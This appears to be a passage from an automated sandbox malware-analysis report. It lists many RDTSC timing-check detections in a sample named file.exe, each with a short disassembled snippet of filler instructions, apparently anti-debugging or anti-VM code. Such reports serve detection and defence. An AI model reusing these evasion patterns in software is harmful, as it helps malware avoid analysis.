              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61032 second address: D6103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6103F second address: D61049 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61049 second address: D61054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F11A12050B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61054 second address: D6107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F11A1057FACh 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F11A1057FB0h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6107F second address: D61085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61085 second address: D6108F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11A1057FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61644 second address: D6164E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6164E second address: D61652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61652 second address: D6165A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6165A second address: D61662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61662 second address: D61666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61666 second address: D6166C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D618EB second address: D618F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D618F1 second address: D618F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB4443 second address: CB447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11A12050C9h 0x00000011 push ecx 0x00000012 jmp 00007F11A12050BCh 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AC4A second address: D6AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AC50 second address: D6AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF22 second address: D6AF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF28 second address: D6AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF2D second address: D6AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FB9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF4A second address: D6AF58 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF58 second address: D6AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B391 second address: D6B396 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B396 second address: D6B39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6B39F second address: D6B3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71DB6 second address: D71DDA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F11A1057FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11A1057FB4h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71F18 second address: D71F1D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72069 second address: D7208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F11A1057FA6h 0x0000000a jmp 00007F11A1057FB4h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D722D9 second address: D722DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72598 second address: D725C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A1057FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F11A1057FA6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C183 second address: D7C194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F11A12050B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C194 second address: D7C198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C198 second address: D7C1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F11A12050B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C1B1 second address: D7C1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C1B8 second address: D7C1C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F11A12050BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BB72 second address: D7BB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BB78 second address: D7BB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F11A12050B6h 0x0000000a popad 0x0000000b je 00007F11A12050B8h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BB8B second address: D7BB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FAAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BB9B second address: D7BB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BB9F second address: D7BBA9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11A1057FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BBA9 second address: D7BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F11A12050B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BE20 second address: D7BE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BE28 second address: D7BE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87538 second address: D8753C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8753C second address: D87546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87546 second address: D8755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8755C second address: D87587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F11A12050C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D870D7 second address: D870DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8725D second address: D87269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F11A12050B6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C318 second address: D8C324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11A1057FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8BEAD second address: D8BEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D99EFD second address: D99F0E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F11A1057FAAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C0ED second address: D9C0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C0F3 second address: D9C0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C0F8 second address: D9C109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9BF61 second address: D9BF6F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F11A1057FA6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9BF6F second address: D9BF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9BF73 second address: D9BF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5FFB second address: CB5FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2CD4 second address: DA2CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2F4B second address: DA2F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2F4F second address: DA2F5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F11A1057FA6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2F5D second address: DA2F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA30BB second address: DA30BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA30BF second address: DA30C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA30C3 second address: DA30DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F11A1057FA8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push ebx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3241 second address: DA3245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3245 second address: DA3249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3249 second address: DA324F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA33E5 second address: DA33EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3537 second address: DA353B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FEF second address: DA3FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F11A1057FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FFA second address: DA401A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050C5h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA80CF second address: DA80EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F11A1057FB5h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA80EB second address: DA80FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F11A12050B6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9CAF second address: DA9CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB2851 second address: DB286F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BCh 0x00000007 jo 00007F11A12050B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F11A12050BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7317 second address: DC731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC731B second address: DC731F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9E14 second address: DC9E20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F11A1057FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9E20 second address: DC9E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9F78 second address: DC9F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9F86 second address: DC9F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFBE2 second address: DDFBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFBE8 second address: DDFBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFBEC second address: DDFC1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A1057FB9h 0x0000000d jmp 00007F11A1057FB2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE02E8 second address: DE02F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A12050BBh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE0545 second address: DE054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE0862 second address: DE086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F11A12050BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE4C7B second address: DE4C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE4E22 second address: DE4E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE870B second address: DE8710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547021B second address: 547021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547021F second address: 5470225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470225 second address: 547027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 08h 0x0000000d pushfd 0x0000000e jmp 00007F11A12050C3h 0x00000013 sub cx, A9CEh 0x00000018 jmp 00007F11A12050C9h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F11A12050BCh 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547027E second address: 5470284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470284 second address: 5470288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470288 second address: 54702B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F11A1057FB9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702B2 second address: 54702B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702B6 second address: 54702BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54702BC second address: 54702D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050C1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547031F second address: 5470325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470325 second address: 5470376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F11A12050C9h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007F11A12050C1h 0x00000018 xor esi, 4D131B96h 0x0000001e jmp 00007F11A12050C1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470376 second address: 54703F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F11A1057FB7h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F11A1057FB9h 0x0000000f add ah, 00000056h 0x00000012 jmp 00007F11A1057FB1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ax, dx 0x00000024 pushfd 0x00000025 jmp 00007F11A1057FAFh 0x0000002a jmp 00007F11A1057FB3h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54703F1 second address: 5470409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A12050C4h 0x00000009 rdtsc
